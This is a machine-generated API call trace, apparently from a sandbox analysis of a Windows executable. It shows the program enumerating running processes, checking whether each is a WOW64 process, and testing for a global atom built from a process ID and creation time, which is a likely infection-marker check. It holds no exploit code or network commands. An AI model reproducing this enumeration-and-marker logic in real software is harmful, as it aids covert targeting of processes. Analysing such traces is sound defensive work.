	[0126.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.720] CloseHandle (hObject=0x2dc) returned 1
	[0126.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.720] CloseHandle (hObject=0x2dc) returned 1
	[0126.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.721] CloseHandle (hObject=0x2dc) returned 1
	[0126.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.721] CloseHandle (hObject=0x2dc) returned 1
	[0126.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.722] CloseHandle (hObject=0x2dc) returned 1
	[0126.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.722] CloseHandle (hObject=0x2dc) returned 1
	[0126.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.722] CloseHandle (hObject=0x2dc) returned 1
	[0126.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.723] CloseHandle (hObject=0x2dc) returned 1
	[0126.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.723] CloseHandle (hObject=0x2dc) returned 1
	[0126.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.724] CloseHandle (hObject=0x2dc) returned 1
	[0126.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.724] CloseHandle (hObject=0x2dc) returned 1
	[0126.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.724] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetLastError () returned 0x5
	[0126.725] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.726] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.726] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.726] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.727] GetLastError () returned 0x5
	[0126.728] GetLastError () returned 0x5
	[0126.728] GetLastError () returned 0x5
	[0126.728] GetLastError () returned 0x5
	[0126.728] GetLastError () returned 0x5
	[0126.728] GetLastError () returned 0x5
	[0126.728] GetLastError () returned 0x5
	[0126.728] GetLastError () returned 0x5
	[0126.728] GetLastError () returned 0x5
	[0126.728] GetLastError () returned 0x5
	[0126.728] GetLastError () returned 0x5
	[0126.728] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.728] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.728] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.728] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.728] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.728] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.728] CloseHandle (hObject=0x2dc) returned 1
	[0126.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.729] CloseHandle (hObject=0x2dc) returned 1
	[0126.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.729] CloseHandle (hObject=0x2dc) returned 1
	[0126.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.730] CloseHandle (hObject=0x2dc) returned 1
	[0126.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.730] CloseHandle (hObject=0x2dc) returned 1
	[0126.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.730] CloseHandle (hObject=0x2dc) returned 1
	[0126.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.766] CloseHandle (hObject=0x2dc) returned 1
	[0126.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.767] CloseHandle (hObject=0x2dc) returned 1
	[0126.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.767] CloseHandle (hObject=0x2dc) returned 1
	[0126.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.768] CloseHandle (hObject=0x2dc) returned 1
	[0126.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.768] CloseHandle (hObject=0x2dc) returned 1
	[0126.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.768] CloseHandle (hObject=0x2dc) returned 1
	[0126.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.769] CloseHandle (hObject=0x2dc) returned 1
	[0126.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.769] CloseHandle (hObject=0x2dc) returned 1
	[0126.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.770] CloseHandle (hObject=0x2dc) returned 1
	[0126.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.770] CloseHandle (hObject=0x2dc) returned 1
	[0126.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.770] CloseHandle (hObject=0x2dc) returned 1
	[0126.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.771] CloseHandle (hObject=0x2dc) returned 1
